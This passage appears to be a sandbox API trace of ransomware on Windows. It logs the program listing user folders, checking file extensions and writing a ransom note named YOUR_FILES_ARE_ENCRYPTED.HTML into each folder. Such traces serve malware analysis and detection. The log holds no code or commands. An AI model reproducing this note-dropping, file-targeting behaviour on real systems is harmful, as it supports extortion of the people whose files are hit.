(lpFileName="\\\\?\\C:\\Users\\Default\\Saved Games\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\default\\saved games\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5a0 [0171.393] WriteFile (in: hFile=0x5a0, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebe12c, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebe12c*=0x3c00, lpOverlapped=0x0) returned 1 [0171.396] CloseHandle (hObject=0x5a0) returned 1 [0171.396] GetProcessHeap () returned 0x270000 [0171.397] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74fa010 | out: hHeap=0x270000) returned 1 [0171.397] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xbc8e9ac0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbc935d80, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xb4f027ae, ftLastWriteTime.dwHighDateTime=0x1cb88fb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="Searches", cAlternateFileName="")) returned 1 [0171.397] wnsprintfW (in: pszDest=0x74ea008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\Searches") returned 29 [0171.397] GetProcessHeap () returned 0x270000 [0171.397] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74fa010 [0171.397] lstrcpyW (in: lpString1=0x74fa010, lpString2="\\\\?\\C:\\Users\\Default\\Searches" | out: lpString1="\\\\?\\C:\\Users\\Default\\Searches") returned="\\\\?\\C:\\Users\\Default\\Searches" [0171.397] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Default\\Searches", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\Default\\Searches\\*") returned="\\\\?\\C:\\Users\\Default\\Searches\\*" [0171.397] FindFirstFileW (in: 
lpFileName="\\\\?\\C:\\Users\\Default\\Searches\\*", lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xbc8e9ac0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbc935d80, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xb4f027ae, ftLastWriteTime.dwHighDateTime=0x1cb88fb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3140 [0171.502] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xbc8e9ac0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbc935d80, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xb4f027ae, ftLastWriteTime.dwHighDateTime=0x1cb88fb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0171.502] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xbc935d80, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbc935d80, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xb4f027ae, ftLastWriteTime.dwHighDateTime=0x1cb88fb, nFileSizeHigh=0x0, nFileSizeLow=0x20c, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0171.502] wnsprintfW (in: pszDest=0x74fa010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\Searches\\desktop.ini") returned 41 [0171.503] lstrcmpW (lpString1="desktop.ini", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0171.503] PathFindExtensionW (pszPath="desktop.ini") returned=".ini" [0171.503] lstrlenW (lpString=".ini") returned 4 [0171.503] PathFindExtensionW (pszPath="desktop.ini") 
returned=".ini" [0171.503] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x23, ftCreationTime.dwLowDateTime=0xbc935d80, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbc935d80, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x898f015e, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0xf8, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="Everywhere.search-ms", cAlternateFileName="EVERYW~1.SEA")) returned 1 [0171.503] wnsprintfW (in: pszDest=0x74fa010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\Searches\\Everywhere.search-ms") returned 50 [0171.503] lstrcmpW (lpString1="Everywhere.search-ms", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0171.503] PathFindExtensionW (pszPath="Everywhere.search-ms") returned=".search-ms" [0171.503] lstrlenW (lpString=".search-ms") returned 10 [0171.503] PathFindExtensionW (pszPath="Everywhere.search-ms") returned=".search-ms" [0171.503] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x23, ftCreationTime.dwLowDateTime=0xbc935d80, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbc935d80, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x898f015e, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0xf8, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="Indexed Locations.search-ms", cAlternateFileName="INDEXE~1.SEA")) returned 1 [0171.503] wnsprintfW (in: pszDest=0x74fa010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\Searches\\Indexed Locations.search-ms") returned 57 [0171.503] lstrcmpW (lpString1="Indexed Locations.search-ms", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0171.503] PathFindExtensionW (pszPath="Indexed Locations.search-ms") returned=".search-ms" 
[0171.503] lstrlenW (lpString=".search-ms") returned 10 [0171.503] PathFindExtensionW (pszPath="Indexed Locations.search-ms") returned=".search-ms" [0171.503] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x23, ftCreationTime.dwLowDateTime=0xbc935d80, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbc935d80, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x898f015e, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0xf8, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="Indexed Locations.search-ms", cAlternateFileName="INDEXE~1.SEA")) returned 0 [0171.503] FindClose (in: hFindFile=0x42f3140 | out: hFindFile=0x42f3140) returned 1 [0171.505] wnsprintfW (in: pszDest=0x74fa010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\Searches\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 59 [0171.505] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Searches\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\default\\searches\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5a0 [0171.508] WriteFile (in: hFile=0x5a0, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebe12c, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebe12c*=0x3c00, lpOverlapped=0x0) returned 1 [0171.511] CloseHandle (hObject=0x5a0) returned 1 [0171.511] GetProcessHeap () returned 0x270000 [0171.521] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74fa010 | out: hHeap=0x270000) returned 1 [0171.521] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x175ece7c, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x175ece7c, 
ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x175ece7c, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="SendTo", cAlternateFileName="")) returned 1 [0171.521] wnsprintfW (in: pszDest=0x74ea008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\SendTo") returned 27 [0171.521] GetProcessHeap () returned 0x270000 [0171.521] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74fa010 [0171.521] lstrcpyW (in: lpString1=0x74fa010, lpString2="\\\\?\\C:\\Users\\Default\\SendTo" | out: lpString1="\\\\?\\C:\\Users\\Default\\SendTo") returned="\\\\?\\C:\\Users\\Default\\SendTo" [0171.522] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Default\\SendTo", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\Default\\SendTo\\*") returned="\\\\?\\C:\\Users\\Default\\SendTo\\*" [0171.522] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\SendTo\\*", lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x23, ftCreationTime.dwLowDateTime=0xbc935d80, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbc935d80, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x898f015e, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0xf8, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="Indexed Locations.search-ms", cAlternateFileName="ꀈݎ")) returned 0xffffffff [0171.522] GetProcessHeap () returned 0x270000 [0171.522] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74fa010 | out: hHeap=0x270000) returned 1 [0171.522] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x17612fdc, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x17612fdc, ftLastAccessTime.dwHighDateTime=0x1ca043f, 
ftLastWriteTime.dwLowDateTime=0x17612fdc, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="Start Menu", cAlternateFileName="STARTM~1")) returned 1 [0171.523] wnsprintfW (in: pszDest=0x74ea008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\Start Menu") returned 31 [0171.523] GetProcessHeap () returned 0x270000 [0171.523] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74fa010 [0171.523] lstrcpyW (in: lpString1=0x74fa010, lpString2="\\\\?\\C:\\Users\\Default\\Start Menu" | out: lpString1="\\\\?\\C:\\Users\\Default\\Start Menu") returned="\\\\?\\C:\\Users\\Default\\Start Menu" [0171.523] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Default\\Start Menu", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\Default\\Start Menu\\*") returned="\\\\?\\C:\\Users\\Default\\Start Menu\\*" [0171.523] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\Start Menu\\*", lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x23, ftCreationTime.dwLowDateTime=0xbc935d80, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbc935d80, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x898f015e, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0xf8, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="Indexed Locations.search-ms", cAlternateFileName="ꀈݎ")) returned 0xffffffff [0171.523] GetProcessHeap () returned 0x270000 [0171.524] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74fa010 | out: hHeap=0x270000) returned 1 [0171.524] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x1763913d, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x1763913d, ftLastAccessTime.dwHighDateTime=0x1ca043f, 
ftLastWriteTime.dwLowDateTime=0x1763913d, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="Templates", cAlternateFileName="TEMPLA~1")) returned 1 [0171.524] wnsprintfW (in: pszDest=0x74ea008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\Templates") returned 30 [0171.524] GetProcessHeap () returned 0x270000 [0171.524] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74fa010 [0171.524] lstrcpyW (in: lpString1=0x74fa010, lpString2="\\\\?\\C:\\Users\\Default\\Templates" | out: lpString1="\\\\?\\C:\\Users\\Default\\Templates") returned="\\\\?\\C:\\Users\\Default\\Templates" [0171.524] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Default\\Templates", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\Default\\Templates\\*") returned="\\\\?\\C:\\Users\\Default\\Templates\\*" [0171.524] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\Templates\\*", lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x23, ftCreationTime.dwLowDateTime=0xbc935d80, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbc935d80, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x898f015e, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0xf8, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="Indexed Locations.search-ms", cAlternateFileName="ꀈݎ")) returned 0xffffffff [0171.524] GetProcessHeap () returned 0x270000 [0171.525] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74fa010 | out: hHeap=0x270000) returned 1 [0171.525] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfa145187, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xbc935d80, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xb4e9038d, 
ftLastWriteTime.dwHighDateTime=0x1cb88fb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="Videos", cAlternateFileName="")) returned 1 [0171.525] wnsprintfW (in: pszDest=0x74ea008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\Videos") returned 27 [0171.525] GetProcessHeap () returned 0x270000 [0171.525] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74fa010 [0171.525] lstrcpyW (in: lpString1=0x74fa010, lpString2="\\\\?\\C:\\Users\\Default\\Videos" | out: lpString1="\\\\?\\C:\\Users\\Default\\Videos") returned="\\\\?\\C:\\Users\\Default\\Videos" [0171.525] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Default\\Videos", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\Default\\Videos\\*") returned="\\\\?\\C:\\Users\\Default\\Videos\\*" [0171.525] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\Videos\\*", lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfa145187, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xbc935d80, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xb4e9038d, ftLastWriteTime.dwHighDateTime=0x1cb88fb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3140 [0171.525] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfa145187, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xbc935d80, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xb4e9038d, ftLastWriteTime.dwHighDateTime=0x1cb88fb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0171.525] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: 
lpFindFileData=0x4ebde60*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xbc935d80, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbc935d80, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xb4e9038d, ftLastWriteTime.dwHighDateTime=0x1cb88fb, nFileSizeHigh=0x0, nFileSizeLow=0x1f8, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0171.525] wnsprintfW (in: pszDest=0x74fa010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\Videos\\desktop.ini") returned 39 [0171.525] lstrcmpW (lpString1="desktop.ini", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0171.526] PathFindExtensionW (pszPath="desktop.ini") returned=".ini" [0171.526] lstrlenW (lpString=".ini") returned 4 [0171.526] PathFindExtensionW (pszPath="desktop.ini") returned=".ini" [0171.526] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xbc935d80, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbc935d80, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xb4e9038d, ftLastWriteTime.dwHighDateTime=0x1cb88fb, nFileSizeHigh=0x0, nFileSizeLow=0x1f8, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="desktop.ini", cAlternateFileName="")) returned 0 [0171.526] FindClose (in: hFindFile=0x42f3140 | out: hFindFile=0x42f3140) returned 1 [0171.526] wnsprintfW (in: pszDest=0x74fa010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\Videos\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 57 [0171.526] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Videos\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\default\\videos\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) 
returned 0x5a0 [0171.526] WriteFile (in: hFile=0x5a0, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebe12c, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebe12c*=0x3c00, lpOverlapped=0x0) returned 1 [0171.529] CloseHandle (hObject=0x5a0) returned 1 [0171.529] GetProcessHeap () returned 0x270000 [0171.529] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74fa010 | out: hHeap=0x270000) returned 1 [0171.529] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfa145187, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xbc935d80, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xb4e9038d, ftLastWriteTime.dwHighDateTime=0x1cb88fb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="Videos", cAlternateFileName="")) returned 0 [0171.530] FindClose (in: hFindFile=0x42f3100 | out: hFindFile=0x42f3100) returned 1 [0171.530] wnsprintfW (in: pszDest=0x74ea008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 50 [0171.530] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\default\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4a4 [0171.530] WriteFile (in: hFile=0x4a4, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebe438, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebe438*=0x3c00, lpOverlapped=0x0) returned 1 [0171.532] CloseHandle (hObject=0x4a4) returned 1 [0171.532] GetProcessHeap () returned 0x270000 [0171.533] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74ea008 | out: hHeap=0x270000) returned 1 [0171.536] 
FindNextFileW (in: hFindFile=0x42f30c0, lpFindFileData=0x4ebe478 | out: lpFindFileData=0x4ebe478*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x1765f29d, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x1765f29d, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x1765f29d, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Default User", cAlternateFileName="DEFAUL~1")) returned 1 [0171.536] wnsprintfW (in: pszDest=0x431df40, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default User") returned 25 [0171.536] GetProcessHeap () returned 0x270000 [0171.536] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74ea008 [0171.538] lstrcpyW (in: lpString1=0x74ea008, lpString2="\\\\?\\C:\\Users\\Default User" | out: lpString1="\\\\?\\C:\\Users\\Default User") returned="\\\\?\\C:\\Users\\Default User" [0171.538] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Default User", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\Default User\\*") returned="\\\\?\\C:\\Users\\Default User\\*" [0171.538] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default User\\*", lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfa145187, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xbc935d80, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xb4e9038d, ftLastWriteTime.dwHighDateTime=0x1cb88fb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="Videos", cAlternateFileName="\㇟∄)) returned 0xffffffff [0171.538] GetProcessHeap () returned 0x270000 [0171.539] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74ea008 | out: hHeap=0x270000) returned 1 [0171.539] FindNextFileW (in: hFindFile=0x42f30c0, lpFindFileData=0x4ebe478 | out: 
lpFindFileData=0x4ebe478*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x6b61335c, ftCreationTime.dwHighDateTime=0x1ca043d, ftLastAccessTime.dwLowDateTime=0x6b61335c, ftLastAccessTime.dwHighDateTime=0x1ca043d, ftLastWriteTime.dwLowDateTime=0x6b61335c, ftLastWriteTime.dwHighDateTime=0x1ca043d, nFileSizeHigh=0x0, nFileSizeLow=0xae, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0171.539] wnsprintfW (in: pszDest=0x431df40, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\desktop.ini") returned 24 [0171.539] lstrcmpW (lpString1="desktop.ini", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0171.539] PathFindExtensionW (pszPath="desktop.ini") returned=".ini" [0171.539] lstrlenW (lpString=".ini") returned 4 [0171.539] PathFindExtensionW (pszPath="desktop.ini") returned=".ini" [0171.539] FindNextFileW (in: hFindFile=0x42f30c0, lpFindFileData=0x4ebe478 | out: lpFindFileData=0x4ebe478*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfa145187, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xc371f54c, ftLastAccessTime.dwHighDateTime=0x1cbf8b8, ftLastWriteTime.dwLowDateTime=0xc371f54c, ftLastWriteTime.dwHighDateTime=0x1cbf8b8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Public", cAlternateFileName="")) returned 1 [0171.539] wnsprintfW (in: pszDest=0x431df40, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Public") returned 19 [0171.539] GetProcessHeap () returned 0x270000 [0171.539] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74ea008 [0171.539] lstrcpyW (in: lpString1=0x74ea008, lpString2="\\\\?\\C:\\Users\\Public" | out: lpString1="\\\\?\\C:\\Users\\Public") returned="\\\\?\\C:\\Users\\Public" [0171.539] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Public", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\Public\\*") returned="\\\\?\\C:\\Users\\Public\\*" 
[0171.539] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Public\\*", lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfa145187, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xc371f54c, ftLastAccessTime.dwHighDateTime=0x1cbf8b8, ftLastWriteTime.dwLowDateTime=0xc371f54c, ftLastWriteTime.dwHighDateTime=0x1cbf8b8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3100 [0171.539] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfa145187, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xc371f54c, ftLastAccessTime.dwHighDateTime=0x1cbf8b8, ftLastWriteTime.dwLowDateTime=0xc371f54c, ftLastWriteTime.dwHighDateTime=0x1cbf8b8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0171.539] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x13, ftCreationTime.dwLowDateTime=0xfa16b2e6, 